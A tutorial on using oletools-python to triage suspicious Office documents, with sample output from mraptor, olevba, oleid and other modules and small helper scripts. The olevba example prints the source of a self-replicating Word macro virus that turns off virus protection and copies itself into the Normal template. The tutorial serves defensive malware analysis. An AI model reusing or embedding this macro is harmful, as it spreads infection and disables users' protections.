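Preface
After working through oletools-python, you should be able to carry out basic analysis of malicious document samples.
What is oletools-python
oletools-python is a set of tools for analyzing MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, intended for malware analysis, forensics, and debugging.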
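As a rough illustration of the two container formats these tools deal with, the sketch below tells an OLE2 compound file from a ZIP-based OpenXML file by its leading bytes. The function name `sniff_container` is hypothetical and not part of oletools; the constants are the well-known CFB and ZIP signatures.

```python
# Header signature of an OLE2 / Compound File Binary file.
OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")
# Local file header signature of a ZIP archive (OpenXML documents are ZIP containers).
ZIP_MAGIC = b"PK\x03\x04"


def sniff_container(path):
    """Return 'ole2', 'zip' or 'unknown' based on the first bytes of the file."""
    with open(path, "rb") as fh:
        head = fh.read(8)
    if head.startswith(OLE2_MAGIC):
        return "ole2"
    if head.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"
```

A signature match only identifies the container; it says nothing about whether the content is malicious.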
Download and installation
- Linux, Mac: sudo -H pip install -U oletools
- Windows: pip install -U oletools
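To confirm that the installation worked, a small check like the following may help. It is a sketch that assumes Python 3.8 or later (for `importlib.metadata`); the helper name `installed_version` is made up for this example.

```python
from importlib import metadata


def installed_version(package="oletools"):
    """Return the installed version string of a package, or None if it is missing."""
    try:
        return metadata.version(package)
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    version = installed_version()
    print("oletools", version if version else "is not installed")
```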
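Tool modules
Tools for analyzing malicious sample files
oleid: analyzes OLE files to detect specific characteristics commonly found in malicious files.
olevba: extracts and analyzes VBA macro source code from MS Office documents (OLE and OpenXML).
MacroRaptor (mraptor): detects malicious VBA macros.
msodde: detects and extracts DDE / DDEAUTO links from MS Office documents, RTF, and CSV files.
pyxswf: detects, extracts, and analyzes Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is particularly useful for malware analysis.
oleobj: extracts embedded objects from OLE files.
rtfobj: extracts embedded objects from RTF files.
Tools for analyzing the structure of OLE files
olebrowse: a simple GUI for browsing OLE files (e.g. MS Word, Excel, PowerPoint documents) to view and extract individual data streams.
olemeta: extracts all standard properties (metadata) from OLE files.
oletimes: extracts the creation and modification timestamps of all streams and storages.
oledir: displays all directory entries of an OLE file, including free and orphaned entries.
olemap: displays a map of all sectors in an OLE file.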
Examples
- Check whether a sample contains suspicious macros (macro viruses)
python mraptor.py file.docx
Output:
MacroRaptor 0.51 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result |Flags|Type|File
----------+-----+----+--------------------------------------------------------
Macro OK |--- |TXT |log.docx
Flags: A=AutoExec, W=Write, X=Execute
Exit code: 2 - Macro OK
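Unlike antivirus engines, which match signatures, mraptor detects most malicious VBA macros with heuristics. It looks for three kinds of behavior: an auto-execution trigger (A), a write to the file system or memory (W), and the execution of a file or payload outside the VBA context (X). A macro is reported as suspicious when A is present together with W or X.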
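The decision rule, A and (W or X), can be sketched in a few lines. This is only an illustration of the idea: the keyword lists below are drastically shortened assumptions, not mraptor's actual patterns, and `classify` is a hypothetical name.

```python
import re

# Simplified keyword lists for illustration only; mraptor's real patterns are far more complete.
AUTOEXEC = re.compile(r"\b(AutoOpen|AutoExec|Auto_Open|Document_Open|Workbook_Open)\b", re.I)
WRITE = re.compile(r"\b(Write|Put|SaveToFile|CreateTextFile|Kill)\b", re.I)
EXECUTE = re.compile(r"\b(Shell|ShellExecute|CreateObject)\b", re.I)


def classify(vba_code):
    """Return (verdict, flags) using the rule: suspicious if A and (W or X)."""
    a = bool(AUTOEXEC.search(vba_code))
    w = bool(WRITE.search(vba_code))
    x = bool(EXECUTE.search(vba_code))
    flags = ("A" if a else "-") + ("W" if w else "-") + ("X" if x else "-")
    verdict = "SUSPICIOUS" if a and (w or x) else "Macro OK"
    return verdict, flags
```

A macro that only auto-executes, or only writes or executes without an automatic trigger, stays "Macro OK" under this rule, which matches the `---` flags in the output above.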
- Get the creation and modification times of all streams and storages in a sample
python oletimes.py file.doc
Output:
FILE: file.doc
+----------------------------+---------------------+---------------+
| Stream/Storage name | Modification Time | Creation Time |
+----------------------------+---------------------+---------------+
| Root | 2017-01-04 02:04:53 | None |
| '\x01CompObj' | None | None |
| '\x05DocumentSummaryInform | None | None |
| ation' | | |
| '\x05SummaryInformation' | None | None |
| '1Table' | None | None |
| 'Data' | None | None |
| 'WordDocument' | None | None |
+----------------------------+---------------------+---------------+
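When working through a large number of document samples, the timestamps reported by oletimes help establish the order in which files were created and how they relate to one another.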
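One way to put samples in chronological order is sketched below. It assumes the `olefile` package (a dependency of oletools) is available and reads only the root storage timestamp, the "Root" row in the table above; both function names are hypothetical.

```python
def root_mtime(path):
    """Read the modification time of the root storage of an OLE file."""
    import olefile  # imported lazily so order_by_mtime() works without it

    ole = olefile.OleFileIO(path)
    try:
        return ole.root.getmtime()  # a datetime, or None when no timestamp is stored
    finally:
        ole.close()


def order_by_mtime(records):
    """Sort (filename, datetime-or-None) pairs chronologically; undated files go last."""
    dated = sorted((r for r in records if r[1] is not None), key=lambda r: r[1])
    undated = [r for r in records if r[1] is None]
    return dated + undated
```

For a folder of samples, something like `order_by_mtime([(p, root_mtime(p)) for p in paths])` would give the ordering. Keep in mind that these timestamps are stored inside the file and can be forged or missing.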
- View basic information about the stream structure of a document
python oledir.py file.doc
Output:
OLE directory entries in file file.doc:
----+------+-------+----------------------+-----+-----+-----+--------+------
id |Status|Type |Name |Left |Right|Child|1st Sect|Size
----+------+-------+----------------------+-----+-----+-----+--------+------
0 |<Used>|Root |Root Entry |- |- |3 |68 |128
1 |<Used>|Stream |Data |- |- |- |15 |4096
2 |<Used>|Stream |1Table |1 |6 |- |1D |27856
3 |<Used>|Stream |WordDocument |2 |5 |- |0 |10290
4 |<Used>|Stream |\x05SummaryInformation|- |- |- |54 |4096
5 |<Used>|Stream |\x05DocumentSummaryInf|4 |- |- |5C |4096
| | |ormation | | | | |
6 |<Used>|Stream |\x01CompObj |- |- |- |0 |110
7 |unused|Empty | |- |- |- |0 |0
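In the table above, the Child column points at the root of a storage's tree of children, and Left/Right link siblings within that tree. The sketch below walks those links for the entries shown; the data is copied from the output, while the function name `children` is made up for this example.

```python
# Directory entries copied from the oledir output above: id -> (name, left, right, child)
ENTRIES = {
    0: ("Root Entry", None, None, 3),
    1: ("Data", None, None, None),
    2: ("1Table", 1, 6, None),
    3: ("WordDocument", 2, 5, None),
    4: ("\x05SummaryInformation", None, None, None),
    5: ("\x05DocumentSummaryInformation", 4, None, None),
    6: ("\x01CompObj", None, None, None),
}


def children(entries, storage_id):
    """Return the ids of a storage's children via in-order traversal of its sibling tree."""
    def walk(node):
        if node is None:
            return []
        _name, left, right, _child = entries[node]
        return walk(left) + [node] + walk(right)

    return walk(entries[storage_id][3])


print(children(ENTRIES, 0))  # [1, 2, 6, 3, 4, 5]
```

The resulting order (Data, 1Table, CompObj, WordDocument, SummaryInformation, DocumentSummaryInformation) runs from the shortest name to the longest, which is how the compound file format sorts directory entries.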
- Extract the standard properties (metadata) of a document
python olemeta.py file.doc
Output:
FILE: file.doc
Properties from the SummaryInformation stream:
+---------------------+------------------------------+
|Property |Value |
+---------------------+------------------------------+
|codepage |936 |
|title | |
|subject | |
|author |TIPDM |
|keywords | |
|template |Normal.dotm |
|last_saved_by |User |
|revision_number |6 |
|total_edit_time |1740 |
|last_printed |2016-06-27 05:49:00 |
|create_time |2016-07-27 23:49:00 |
|last_saved_time |2017-01-04 02:04:00 |
|num_pages |1 |
|num_words |87 |
|num_chars |498 |
|creating_application |Microsoft Office Word |
|security |0 |
+---------------------+------------------------------+
Properties from the DocumentSummaryInformation stream:
+---------------------+------------------------------+
|Property |Value |
+---------------------+------------------------------+
|codepage_doc |936 |
|lines |4 |
|paragraphs |1 |
|scale_crop |False |
|company | |
|links_dirty |False |
|chars_with_spaces |584 |
|shared_doc |False |
|hlinks_changed |False |
|version |917504 |
+---------------------+------------------------------+
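The same properties can be read from a script. The sketch below assumes the `olefile` package is installed and uses its `get_metadata()` call; the helper names and the choice of fields are illustrative, and text values may come back as bytes depending on the olefile version.

```python
# A few properties that are often useful for attribution and timelines (an arbitrary selection).
FIELDS = ("author", "last_saved_by", "create_time", "last_saved_time", "creating_application")


def read_metadata(path):
    """Parse the SummaryInformation and DocumentSummaryInformation streams of an OLE file."""
    import olefile  # imported lazily so summarize() works without it

    ole = olefile.OleFileIO(path)
    try:
        return ole.get_metadata()
    finally:
        ole.close()


def summarize(meta, fields=FIELDS):
    """Pick selected properties from a metadata object into a plain dict."""
    return {name: getattr(meta, name, None) for name in fields}
```

Calling `summarize(read_metadata("file.doc"))` would return a dictionary with the five selected properties, which is easier to compare across many samples than the printed tables.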
- Extract the macro code of a document
python olevba.py file.doc
Output:
Flags Filename
----------- -----------------------------------------------------------------
OLE:MAS--B-- file.doc
===============================================================================
FILE: file.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: file.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'APMP
'KILL
Private Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then _
Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
With Host
If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, MyCode
If ThisDocument = NormalTemplate Then _
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End With
End Sub
+------------+----------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------+-----------------------------------------+
| AutoExec | Document_Open | Runs when the Word or Publisher |
| | | document is opened |
| Suspicious | KILL | May delete a file |
| Suspicious | VBProject | May attempt to modify the VBA code |
| | | (self-modification) |
| Suspicious | VBComponents | May attempt to modify the VBA code |
| | | (self-modification) |
| Suspicious | CodeModule | May attempt to modify the VBA code |
| | | (self-modification) |
| Suspicious | Base64 Strings | Base64-encoded strings were detected, |
| | | may be used to obfuscate strings |
| | | (option --decode to see all) |
+------------+----------------+-----------------------------------------+
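olevba parses OLE and OpenXML files and detects whether their VBA macros are suspicious. It extracts the macro source code and scans it for suspicious keywords, including those used by anti-sandboxing and anti-virtualization techniques, as well as potential IOCs (IP addresses, URLs, executable file names, etc.). It can also detect and decode several common obfuscation methods, including hex encoding, reversed strings, Base64, Dridex, and VBA expressions, and extract IOCs from the decoded strings.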
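olevba can also be used as a library. The sketch below relies on `VBA_Parser`, `detect_vba_macros()` and `analyze_macros()` from `oletools.olevba`; the wrapper names `analyze` and `group_by_type` are hypothetical, and the grouping is just one possible way to condense the findings table shown above.

```python
from collections import defaultdict


def analyze(path):
    """Return olevba's (type, keyword, description) findings for one file."""
    from oletools.olevba import VBA_Parser  # imported lazily so group_by_type() works without oletools

    parser = VBA_Parser(path)
    try:
        if not parser.detect_vba_macros():
            return []
        return list(parser.analyze_macros())
    finally:
        parser.close()


def group_by_type(findings):
    """Group keywords by finding type, e.g. 'AutoExec' or 'Suspicious'."""
    grouped = defaultdict(list)
    for kind, keyword, _description in findings:
        grouped[kind].append(keyword)
    return dict(grouped)
```

For the sample above, grouping the findings would put `Document_Open` under `AutoExec` and `KILL`, `VBProject`, `VBComponents`, `CodeModule` and `Base64 Strings` under `Suspicious`.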
- Detect specific characteristics of a document
python oleid.py file.doc
Output:
Filename: file.doc
+-------------------------------+-----------------------+
| Indicator | Value |
+-------------------------------+-----------------------+
| OLE format | True |
| Has SummaryInformation stream | True |
| Application name | Microsoft Office Word |
| Encrypted | False |
| Word Document | True |
| VBA Macros | False |
| Excel Workbook | False |
| PowerPoint Presentation | False |
| Visio Drawing | False |
| ObjectPool | False |
| Flash objects | 0 |
+-------------------------------+-----------------------+
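oleid reports the characteristics of a potentially malicious document: the OLE file type (e.g. MS Word, Excel, PowerPoint), the presence of VBA macros, embedded Flash objects, embedded OLE objects, and MS Office encryption.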
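For scripted triage, the indicators can be filtered down to the ones that deserve a closer look. This sketch uses `OleID(...).check()` from `oletools.oleid` and assumes the boolean and integer values shown in the table above; other oleid releases may report values in a different form, so treat the filter as an assumption. The names `check_file` and `noteworthy` are made up for this example.

```python
# Indicator names taken from the table above that usually warrant a closer look.
WATCH_LIST = ("VBA Macros", "Encrypted", "Flash objects", "ObjectPool")


def check_file(path):
    """Run oleid on one file and return its list of indicator objects."""
    from oletools.oleid import OleID  # imported lazily so noteworthy() works without oletools

    return OleID(path).check()


def noteworthy(indicators, names=WATCH_LIST):
    """Keep watch-list indicators whose value is truthy (not False and not 0)."""
    return [(i.name, i.value) for i in indicators if i.name in names and i.value]
```

With the values from the table above, `noteworthy` returns an empty list, since none of the watched indicators is set.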
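Summary
The next time you come across a suspicious document sample (for example, a document attached to an anonymous email, a file uploaded to a QQ group, or a document shared through a cloud drive), you can use the methods described above for a basic first-pass analysis.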
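When many such files pile up, a first pass can be automated. The sketch below runs mraptor on every file in a folder and maps its exit code to a verdict. It assumes that the `mraptor` command installed by pip is on the PATH, and the exit-code table follows the mraptor documentation as far as I know it (only code 2 appears in the output earlier in this article), so check it against your installed version. The function names are hypothetical.

```python
import subprocess
from pathlib import Path

# Exit codes as described in the mraptor documentation; verify against your version.
EXIT_CODES = {0: "No Macro", 1: "Not MS Office", 2: "Macro OK", 10: "ERROR", 20: "SUSPICIOUS"}


def verdict(exit_code):
    """Translate an mraptor exit code into a readable verdict."""
    return EXIT_CODES.get(exit_code, "unknown exit code %d" % exit_code)


def triage(folder, command=("mraptor",)):
    """Run mraptor on each file in a folder and return {filename: verdict}."""
    results = {}
    for path in sorted(Path(folder).iterdir()):
        if path.is_file():
            proc = subprocess.run([*command, str(path)], capture_output=True)
            results[path.name] = verdict(proc.returncode)
    return results
```

Files reported as SUSPICIOUS are then good candidates for a closer look with olevba.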